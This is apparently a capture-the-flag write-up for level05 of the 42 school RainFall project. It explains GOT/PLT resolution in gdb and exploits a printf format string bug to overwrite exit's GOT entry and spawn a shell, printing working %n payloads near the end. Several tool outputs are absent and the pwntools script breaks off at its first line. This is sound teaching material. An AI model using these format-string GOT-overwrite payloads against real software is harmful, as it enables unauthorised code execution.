Welcome to RainFall

🌊 Level05 of Rainfall Project (Overwrite the GOT with format string) 🌊
🔍 Introduction
Hello, today I’m gonna show you level 5 of the Rainfall project from 42 school.
🔍 Quick view of the binary
To begin with, we’ll run the file command to determine the file type and format.
So you can run the following command:
$ file ./level5
Normally, you should get output like this:
level5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fb3518ed7ddb097b6f8a23a49fad17a792ae35d8, not stripped
We can see that this is an ELF 32-bit binary with x86 architecture (Intel 80386).
We can also see that the binary is dynamically linked, that the interpreter is located at /lib/ld-linux.so.2, and that it was built for GNU/Linux 2.6.24, which is the minimum kernel version it targets.
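The fields that file reports come straight from the first bytes of the ELF header. Here is a minimal sketch of that lookup, assuming the standard ELF header layout. The function name describe_elf is my own, and the sample header is built by hand for illustration rather than read from level5.

```python
import struct

# Values from the ELF specification.
ELF_CLASS = {1: "32-bit", 2: "64-bit"}
ELF_DATA = {1: "LSB", 2: "MSB"}
EM_386 = 3  # e_machine value for Intel 80386


def describe_elf(header: bytes) -> str:
    """Summarize class, byte order and machine from the first 20 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    elf_class = ELF_CLASS.get(header[4], "unknown class")
    byte_order = ELF_DATA.get(header[5], "unknown byte order")
    # e_type and e_machine follow the 16-byte e_ident array.
    fmt = "<HH" if header[5] == 1 else ">HH"
    _e_type, e_machine = struct.unpack_from(fmt, header, 16)
    machine = "Intel 80386" if e_machine == EM_386 else f"machine {e_machine}"
    return f"ELF {elf_class} {byte_order}, {machine}"


# Hand-built header for illustration only (not read from the level5 binary):
# magic, class=1 (32-bit), data=1 (LSB), version=1, padding, e_type=2, e_machine=3.
sample = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9) + struct.pack("<HH", 2, EM_386)
print(describe_elf(sample))
```

On a real file you could pass the first 20 bytes, for example `describe_elf(open("./level5", "rb").read(20))`.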
We can use the readelf command to retrieve a little more information about the binary.
readelf -h ./level5
You should see something like this:
ELF Header:
Now, let’s take a deeper dive into the binary. We can use tools such as objdump or nm to list the available symbols. Additionally, we can run strings to extract readable text from the binary.
For my part, I’ll go straight to debugging by opening it in gdb with the GEF extension.
gdb ./level5
A binary consists of different sections that work together to ensure its functionality. This becomes even more interesting when the binary is dynamically linked, as ours is.
I’ll revisit this point later.
If you run the following command in gdb:
info file
You should have something like this:
Symbols from "/home/sam0verfl0w/repos/RainFall/level5/Ressources/level5".
✨ Quick view of ELF (Executable and Linkable Format) file format
As you can see, we can view the different sections of the binary.
For example, the .text section contains the processor opcodes that the CPU will execute.
We also have other sections, such as:
- .rodata – Contains strings or data that are accessible in read-only mode.
- .bss – Holds global and static variables that have no initial value stored in the binary (they are zero-filled when the program is loaded).
Additionally, there are sections responsible for loading and launching the binary into memory, such as:
- .interp, .dynamic, .dynsym, .dynstr
- .plt, .got, .rel.dyn, .rel.plt, .got.plt
I’ll go into more detail about these later.
For now, let’s disassemble the binary and analyze how the program works.
If you run the following command in gdb:
info functions
All defined functions:
If we disassemble the main function with this command:
disas main
You should have something like this:
Dump of assembler code for function main:
We notice that our main function makes a call to the function n.
If we disassemble it, we can analyze its behavior.
disas n
Dump of assembler code for function n:
We notice several things in this code.
One important detail I haven’t mentioned yet: on 32-bit x86, the default calling convention (cdecl) passes function arguments on the stack, which operates in LIFO (Last In, First Out) order. This means that the last value pushed onto the stack will be the first one to be popped.
On x86_64, however, the standard calling convention passes the first arguments in registers instead of on the stack.
You can explore the different calling conventions in more detail here:
🔗 x86 Calling Conventions
Identify the vulnerability
0x080484c2 <+0>: push ebp
If we go back to this piece of code, we can see that after the function prologue, a small amount of space is allocated on the stack—specifically 0x218 in hexadecimal (536 bytes).
We also notice a call to the fgets function.
After executing sub esp, 0x218, the processor loads a value from a specific address in the data segment (ds).
If we use the following command in gdb:
x/x <address_from_data_segment>
We can observe the value stored at that address.
0x8049848 <stdin@@GLIBC_2.0>: 0x00000000
Note that this stdin is libc’s FILE * stream object, not the file descriptor (at the descriptor level, 0 is STDIN, 1 is STDOUT, 2 is STDERR). It reads as 0 here presumably because the program has not been started yet, so the loader has not filled it in.
We can see that this address points to libc’s stdin symbol, which serves as the last parameter of our fgets function. This value will be stored on the stack at the last argument position, [esp+0x8].
🧪 Understanding the fgets Call
Without even running the program, we now know that fgets takes user input—pretty cool!
If we continue analyzing the code, we notice that:
- At esp+0x4, the program requests 0x200 bytes (512 bytes in decimal) to be read.
- The lea (Load Effective Address) instruction computes the address ebp - 0x208, which is the starting address of our buffer.
- This buffer address is then placed at the top of the stack, completing the setup for the fgets function call.
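To make the numbers above concrete, here is a small sketch that lays out the three fgets arguments and checks the sizes. The constant and variable names are my own; the values are the ones read from the disassembly. It suggests that fgets itself cannot overflow the buffer, so the bug has to be somewhere else.

```python
# Offsets taken from the disassembly discussed above.
FRAME_SIZE = 0x218      # sub esp, 0x218
BUFFER_OFFSET = 0x208   # buffer starts at ebp - 0x208
FGETS_SIZE = 0x200      # second argument of fgets

# Arguments as they sit on the stack just before `call fgets` (cdecl):
# the first argument is at the lowest address.
fgets_args = {
    "[esp]": "buffer (ebp - 0x208)",
    "[esp+0x4]": FGETS_SIZE,
    "[esp+0x8]": "stdin",
}

# fgets stores at most size - 1 characters plus a terminating NUL byte,
# so it never writes more than FGETS_SIZE bytes into the buffer.
max_bytes_written = FGETS_SIZE
room_before_saved_ebp = BUFFER_OFFSET

print(FRAME_SIZE, BUFFER_OFFSET, FGETS_SIZE)        # 536 520 512
print(max_bytes_written <= room_before_saved_ebp)   # True
```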
☣️ The Developer’s Critical Mistake
What follows is a disaster: the developer has introduced a serious vulnerability!
- The return value of fgets is stored in the eax register, meaning eax holds a pointer to our input buffer.
- The problem? This buffer is passed directly to printf as the format string itself!
- The function then ends with a call to exit(1), terminating the program.
😎 Exploiting the Vulnerability
If you haven’t figured it out yet, this vulnerability is known as a format string vulnerability.
This means we can manipulate memory by crafting specific inputs.
Let’s put it to the test!
If you run the program and enter %x as input, you’ll notice that we can read values directly from the stack.
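A common way to use this leak is to send a recognizable marker followed by several %x conversions, then look for the marker among the printed words. The sketch below builds such a probe and finds the marker's position. The helper names are hypothetical, and the sample output is made up for illustration; it is not captured from level5.

```python
def build_probe(marker: bytes = b"AAAA", count: int = 8) -> bytes:
    """Return the marker followed by `count` '%x' conversions separated by dots."""
    return marker + b".%x" * count + b"\n"


def find_offset(leak: str, marker: bytes = b"AAAA"):
    """Return the 1-based position of the marker among the leaked words, or None."""
    # On little-endian x86, b"AAAA" read back as a 32-bit word prints as 41414141.
    wanted = format(int.from_bytes(marker, "little"), "x")
    words = leak.strip().split(".")[1:]  # drop the echoed marker itself
    for position, word in enumerate(words, start=1):
        if word == wanted:
            return position
    return None


# Hypothetical program output, invented for this example.
sample_leak = "AAAA.200.b7fd1ac0.b7ff37d0.41414141.2e78252e"
print(build_probe())
print(find_offset(sample_leak))
```

The returned position is the number to use in a positional conversion such as %N$p or %N$n.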
Even though we understand the potential of this vulnerability, we still need to figure out how to exploit it effectively.
To do that, let’s go back to our list of functions—there’s still one function we haven’t explored yet.
What if we disassemble the o function?
0x080484a4 <+0>: push ebp
We see that this function calls the system function with a string as an argument.
If we run the following command in gdb:
gef➤ x/s 0x80485f0
💡 Exploiting the Format String Vulnerability
Great! We now know that the o function executes a shell.
However, this function is never called in the normal execution flow—so how can we force the program to call it using our format string vulnerability?
At this point, we could run checksec to analyze the binary’s protections, but that won’t help much.
We could also use nm to inspect symbols and variables, but we’ve already determined that there are no global variables being checked or executed.
💡 Enter GOT and PLT
This is where we introduce **GOT (Global Offset Table) and PLT (Procedure Linkage Table)**—key concepts for dynamically linked binaries.
GOT (Global Offset Table):
A table containing addresses of functions resolved at runtime, allowing dynamically linked libraries (like libc) to be used efficiently.
PLT (Procedure Linkage Table):
A mechanism used to indirectly call functions in shared libraries. When a function is called for the first time, the PLT redirects it through the GOT for resolution.
Understanding how these work will allow us to redirect execution and exploit our format string vulnerability to force the execution of o(), giving us a shell.
💡 Understanding GOT and PLT
GOT (Global Offset Table)
The Global Offset Table (GOT) is a section in an ELF binary that helps resolve memory addresses dynamically at runtime.
It is crucial for Position Independent Code (PIC) and Position Independent Executables (PIE), which are designed to be loaded at different memory addresses each time the program runs.
- Since the absolute memory addresses of variables and functions are unknown before execution, the GOT helps map symbols to their corresponding memory addresses at runtime.
- This allows shared libraries (.so files) to be loaded at arbitrary addresses, avoiding conflicts with the main program or other libraries.
- The GOT is represented in the .got and .got.plt sections of an ELF file.
- The dynamic linker updates GOT entries at program startup or when specific symbols are accessed.
- Position independence is also what makes address randomization (ASLR) possible, which makes it harder for attackers to rely on hardcoded addresses.
PLT (Procedure Linkage Table)
While the GOT stores the resolved addresses, the Procedure Linkage Table (PLT) holds the small code stubs through which external functions are called.
- Since the linker cannot resolve function calls between different dynamically linked objects at link time, it sets up a PLT entry for each external function.
- The first time a function is called, execution is redirected through the PLT, which then resolves the function’s actual address via the GOT.
- This enables position-independent function calls without compromising binary portability or shareability.
- Both executables and shared libraries have their own PLT sections to manage this process.
Understanding GOT and PLT will be key to redirecting execution flow and exploiting format string vulnerabilities in dynamically linked binaries.
$ objdump -d level5 -M intel -j .plt
You should have something like this:
level5: file format elf32-i386
Understanding PLT Stubs and Function Resolution in a Dynamically Linked Binary
Each symbol in the Procedure Linkage Table (PLT), like mysymbol@PLT, corresponds to a PLT stub.
A stub is a small executable code snippet that serves as an intermediary for dynamic function calls.
PLT Stub Characteristics
- Each PLT stub is aligned to 16 bytes for optimization and predictability.
- The .plt section contains all function stubs for dynamically linked functions.
Execution Flow in a Dynamically Linked Binary
- When the binary starts, execution begins at the _start symbol.
- _start calls __libc_start_main, which in turn calls the main function.
- Inside main, when a function like puts is called, the CPU jumps to the corresponding PLT stub.
- The PLT stub then:
  - Looks for the function address in the Global Offset Table (GOT).
  - If the function is already resolved, it jumps directly to it (e.g., puts in libc).
  - If not, the stub pushes a value identifying the function’s relocation entry onto the stack and calls the dynamic linker to resolve it.
- The dynamic linker finds the correct function, writes its address to the GOT, and execution continues.
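The flow above can be mimicked with a toy model. This is only a sketch of the idea in Python, not how the dynamic linker is implemented: the class LazyBinder, its fields, and the fake puts are all names I made up for the illustration.

```python
class LazyBinder:
    """Toy model of lazy binding: a GOT slot is filled in on the first call."""

    def __init__(self, library):
        self.library = library   # stands in for libc's symbol table
        self.got = {}            # symbol name -> callable currently in the slot
        self.resolutions = 0     # how many times the "dynamic linker" ran

    def _resolve(self, name):
        # The "dynamic linker": look the symbol up and patch the GOT slot.
        self.resolutions += 1
        self.got[name] = self.library[name]
        return self.got[name]

    def call_via_plt(self, name, *args):
        # The PLT stub always goes through the GOT slot.
        target = self.got.get(name)
        if target is None:       # unresolved: fall back to the resolver
            target = self._resolve(name)
        return target(*args)


binder = LazyBinder({"puts": lambda s: len(s) + 1})
binder.call_via_plt("puts", "hello")   # first call triggers resolution
binder.call_via_plt("puts", "world")   # second call uses the patched slot
print(binder.resolutions)
```

In this model, assigning a different callable to binder.got["puts"] changes what every later call runs, which is the idea behind a GOT overwrite.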
Example with a Simple Binary
To analyze this, we can compile a basic dynamically linked binary and disassemble its PLT and GOT using tools like objdump and readelf.
// gcc example.c -o example -m32 -fno-stack-protector -no-pie -z execstack
We’re going to compile this program as 32-bit so that it follows the same calling convention as level5, and use it to see how the GOT and PLT behave in practice.
We’ll open our binary with gdb (with GEF or PEDA, as you like), then place a breakpoint at the entry of the main function.
We can also put a breakpoint before each puts call.
Once the program is launched, a first continue takes us to just before the first puts call.
run
Once here, we can run the got command, which shows us the puts entry in our GOT.
got
You should have something like this:
gef➤ got
So you can see that we’ve found our puts, but if we look at where it’s pointing, you’ll notice that it’s not the actual address of the puts function in libc.
If we examine the GOT entry for puts, we can verify this behavior:
x/gx &puts
You’ll notice that this address redirects us to the PLT section instead of the actual puts function. But why?
The reason is simple: the puts symbol hasn’t yet been resolved for the first time. The PLT acts as an intermediary to handle function resolution dynamically.
Investigating the Resolution Process
To observe this in action, we can disassemble the GOT entry:
x/i *(puts@got)
This will show that the GOT entry initially points to the corresponding PLT stub. Now, let’s step into the call and see how it works:
b *puts@plt
By stepping through the instructions, we’ll see that:
- The call jumps to the PLT stub.
- If the function hasn’t been resolved, the stub triggers a dynamic linker call.
- The linker resolves the actual address of puts in the shared library (libc).
- The resolved address is written to the GOT, so future calls go straight from the PLT stub to puts without invoking the linker again.
Once the function has been resolved, subsequent calls to puts will directly use the resolved address in the GOT, avoiding additional linker overhead.
Now that we understand how PLT and GOT work, we can leverage this knowledge for exploitation techniques such as function hijacking or ret2plt attacks! 🚀
si
0x8049040 <puts@plt+0> jmp DWORD PTR ds:0x804c004
The first instruction is an indirect jump through the GOT entry of puts. If we do an x/x on that entry, we find an address that points back into the PLT because, as I explained earlier, the function hasn’t been resolved yet.
gef➤ x/x 0x804c004
Stepping Through the PLT Resolution
As you can see, the address pointed to by the data segment is 0x804c004.
This address corresponds to the following entry in the GOT.
To observe how the PLT resolves function calls, we can step through the execution.
ni
This will execute the next instruction and allow the PLT to do its work. As the execution progresses, we will see how the dynamic linker finds the real address of the function and updates the GOT entry accordingly.
By stepping through carefully, we can analyze:
- The transition from the PLT stub to the dynamic linker.
- The moment when the actual function address is resolved.
- How subsequent calls to the function skip the dynamic linker and use the resolved address directly from the GOT.
This understanding is crucial for analyzing binary exploitation techniques, such as GOT overwrite attacks or ret2plt exploits. 🚀
Once this is done, you can see that each stub pushes an integer; here it’s 8. This value identifies the relocation entry of the puts function (on 32-bit x86 it is a byte offset into the .rel.plt table), which tells the dynamic linker which GOT entry to fill in.
The CPU simply pushes this argument onto the stack, since in 32-bit x86 arguments are passed via the stack.
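As far as I know, on 32-bit x86 the integer pushed by a PLT stub is a byte offset into the .rel.plt relocation table, where each entry (Elf32_Rel) is 8 bytes. The sketch below turns the pushed 8 into a relocation index and checks it against the GOT address seen in the stub. It assumes the usual i386 layout in which the first three .got.plt slots are reserved and the common PLT entry pushes slot 1 (0x804bff8 in this example binary); the variable names are my own.

```python
ELF32_REL_SIZE = 8        # sizeof(Elf32_Rel): r_offset (4 bytes) + r_info (4 bytes)
GOT_ENTRY_SIZE = 4        # one 32-bit pointer per slot
RESERVED_GOT_SLOTS = 3    # .got.plt[0..2] are reserved for the dynamic linker

pushed_value = 0x8                    # operand of the push in puts@plt
got_plt_slot1 = 0x804BFF8             # pushed by the common PLT entry (.got.plt[1])
got_plt_base = got_plt_slot1 - GOT_ENTRY_SIZE

reloc_index = pushed_value // ELF32_REL_SIZE
slot_address = got_plt_base + GOT_ENTRY_SIZE * (RESERVED_GOT_SLOTS + reloc_index)

print(reloc_index)          # 1
print(hex(slot_address))    # 0x804c004
```

The computed slot matches the address used by the jmp in puts@plt, which is a good sign that the layout assumption holds for this binary.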
So we execute ni once more.
ni
As you can see, our 8 is now at the top of our stack. The next instruction is a jump, but where to? We’ll see right away.
If we x/i the address we’re going to jump to, we can see that it’s the first entry of the .plt section:
0x8049020 push DWORD PTR ds:0x804bff8
Dynamic Linker Resolution
The address stored at 0x804bffc, which we jump to next, is the dynamic linker’s entry point.
Once inside the dynamic linker function, it will:
- Load the libc if it hasn’t been loaded yet.
- Locate the corresponding puts symbol.
- Write the resolved address to the GOT.
Without delving into the specifics of how the linker works (which will be covered in another tutorial), we finally land at the actual puts function:
0xf7c74c80 <puts+0> endbr32
At this point, if we check the GOT, we can see that the linker has updated it. The address of the puts symbol has now been resolved:
gef➤ got
If we take this new address and examine its context, we can analyze the resolution process further. 🚀
gef➤ fa 0xf7c74c80
Function Resolution in libc
We can see that the function is now correctly resolved, and it is present in libc.
Super! 🎉 Now that we understand how the PLT and GOT work, let’s take it a step further.
If we progress further in the program and call this function again later, what happens? 🤔
Continuing Execution and Function Resolution in libc
We continue execution with:
c
We’ve stopped once again at the next puts call, which will simply execute puts("world");.
Let’s step into the instruction like before and observe how the PLT behaves:
si
0x8049040 <puts@plt+0> jmp DWORD PTR ds:0x804c004
We still see our usual PLT stub. However, if we check the GOT entry we looked at earlier, it now holds the address of libc’s puts function, since it was already resolved once during the program’s execution.
gef➤ x/x 0x804c004
Since the function address is now stored in the GOT, the stub’s jump transfers execution directly to libc’s puts function without going through the dynamic linker again.
gef➤ x/i 0xf7c74c80
Now, puts is fully resolved and directly accessed from libc. 🚀
Overwriting the GOT to Gain Control
Now that we understand how GOT and PLT work, we can leverage a format string vulnerability to overwrite the GOT entry of a function and redirect execution to our shell-spawning function.
Inspecting the GOT
Let’s return to our Level 5 binary, set a breakpoint on main, and inspect the GOT:
gef➤ got
Since there’s no RELRO protection, the GOT is writable, making it possible to overwrite function pointers.
RELRO (RELocation Read-Only): a protection that makes the GOT read-only.
🚀 Next, we will craft an exploit using a format string vulnerability to modify a GOT entry and redirect execution to a function that executes a shell.
Understanding the Initial State of the GOT
At the beginning of program execution, you should observe something like this:
- No function or symbol (except for __libc_start_main) has been resolved yet.
- This is because functions are only resolved once they are called at least once.
- __libc_start_main is an exception since it is invoked from the _start symbol during program initialization.
Choosing a Target for GOT Overwrite
To overwrite a GOT entry, we need to select a suitable function.
However, we cannot target fgets because we still need it for input handling.
🤔 So, what can we do?
If we analyze the function calls in the binary, we might find a candidate that allows us to gain control—perhaps a function like exit or another suitable stub.
🛠️ Next step: Let’s disassemble n and inspect its function calls (call instructions) to determine a viable target for GOT overwrite.
Disassembling Function n
To analyze potential targets for GOT overwrite, let’s disassemble the function n:
gef➤ disassemble n
Observations
- n calls three functions:
  - fgets@plt at 0x080484e5
  - printf@plt at 0x080484f3
  - exit@plt at 0x080484ff
- The function exit@plt (0x080483d0) is a good candidate for GOT overwrite.
- By replacing the GOT entry of exit with the address of o, we can make the program run o(), and therefore a shell, when it calls exit().
Next Steps
We’ll attempt to overwrite exit@got.plt with the address of o to gain execution control. 🚀
❯ ./level5
Great! Now that we know where our buffer is on the stack, all we have to do is replace the A’s with a valid address. You guessed it: the address of exit’s entry in the GOT. Writing through that address lets us change where exit@plt jumps.
If we run objdump and read the GOT address used by the exit@plt stub, you should get the same address as I do, since the binary is dynamically linked but not PIE.
objdump -d ./level5 -M intel -j .plt
As you can see, the address referenced by the jmp in the exit@plt stub is 0x8049838.
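If you want to pull that address out of the disassembly programmatically, a regular expression is enough. This is a small sketch with a hypothetical helper name. The sample line is modelled on objdump's Intel-syntax output; its leading address and byte columns are my assumption rather than a copy of the real output.

```python
import re


def got_slot_from_stub(disassembly_line: str) -> int:
    """Extract the GOT slot address from a PLT stub's indirect jmp."""
    match = re.search(r"jmp\s+DWORD PTR ds:(0x[0-9a-fA-F]+)", disassembly_line)
    if match is None:
        raise ValueError("no indirect jmp found")
    return int(match.group(1), 16)


# Illustrative line for exit@plt (columns before the mnemonic are assumed).
stub_line = " 80483d0:\tff 25 38 98 04 08\tjmp    DWORD PTR ds:0x8049838"
print(hex(got_slot_from_stub(stub_line)))
```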
Now we can start writing. I’ll first build a payload with python3 and finish with a small pwntools script to pwn it directly.
So first, here’s my payload. All we have to do is write the address of the exit entry in the GOT in little endian, as memory is little endian on x86 and x86-64 CPUs.
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b'%4\$p')" | ./level5
In little endian, the address 0x8049838 becomes \x38\x98\x04\x08.
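If you’d rather not reverse the bytes by hand, Python’s struct module does the conversion. A minimal sketch, where the constant name EXIT_GOT is mine:

```python
import struct

EXIT_GOT = 0x8049838  # GOT slot of exit, as read from the exit@plt stub

packed = struct.pack("<I", EXIT_GOT)   # "<I" = little-endian unsigned 32-bit
print(packed.hex())                    # 38980408
print(packed == b"\x38\x98\x04\x08")   # True
```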
So now we can write our payload and check that this holds:
$ python3 -c "import sys; sys.stdout.buffer.write(b'\x38\x98\x04\x08' + b'%4\$p')" | ./level5
If we run our payload against the binary and everything has worked correctly, you should see this:
❯ python3 -c "import sys; sys.stdout.buffer.write(b'\x38\x98\x04\x08' + b'%4\$p')" | ./level5
So you can see that our address appears at the position we expect.
In the final step, we simply replace the %p with a %n, which writes the number of characters printed so far to the address we’ve placed on the stack.
The address of the o function is 0x080484a4, so the number of characters printed before the write must equal the value we want to store. The 4 address bytes at the start of the payload already count toward it, and to keep the output small we only rewrite the low bytes of the entry.
The final payload is here:
(python3 -c "import sys; sys.stdout.buffer.write(b'\x38\x98\x04\x08' + b'%33788c%4\$hn%164c%4\$hhn')";/bin/cat) | ./level5
The payload first prints 33788 padding characters on top of the 4 address bytes, so %4$hn, which writes 2 bytes, stores 0x8400 in the two low bytes of the entry. It then prints 164 more characters and uses %4$hhn, which writes only the least significant byte, to set it to 0xa4. The two high bytes already contain 0x0804, since the unresolved entry still points into the PLT, so the entry now holds 0x080484a4. We add a cat right after to keep stdin open so we can type our commands into the shell.
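The padding values are easy to get wrong, so here is a short sketch that replays the character counts of the payload above and checks the value that ends up in the low half of the entry. The function and variable names are my own; it only models the counting done by printf, not the actual memory write.

```python
O_ADDRESS = 0x080484A4   # address of o()
ADDRESS_BYTES = 4        # the GOT address at the start of the payload is printed first


def simulate(pads, already_printed=ADDRESS_BYTES):
    """Return the running character count after each %<pad>c conversion."""
    counts = []
    total = already_printed
    for pad in pads:
        total += pad
        counts.append(total)
    return counts


after_first, after_second = simulate([33788, 164])
low_half_after_hn = after_first & 0xFFFF                                # %hn stores 16 bits
low_half_final = (low_half_after_hn & 0xFF00) | (after_second & 0xFF)   # %hhn stores 8 bits

print(hex(after_first), hex(after_second))       # 0x8400 0x84a4
print(hex(low_half_final))                       # 0x84a4
print(low_half_final == (O_ADDRESS & 0xFFFF))    # True

# A single %hn would need this much padding to reach the same value:
print((O_ADDRESS & 0xFFFF) - ADDRESS_BYTES)      # 33952
```

In other words, a single %33952c%4$hn should in principle produce the same low half; the two-step version in the payload reaches the same result.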
Super, you’ve got your shell! Because we rewrote exit’s entry in the GOT, every call to exit@plt now executes the function we put there instead, which also means exit is never resolved by the dynamic linker.
Here is a script written with pwntools to make the task easier; pwntools lets you script this kind of exploit quickly.
#!/usr/bin/python3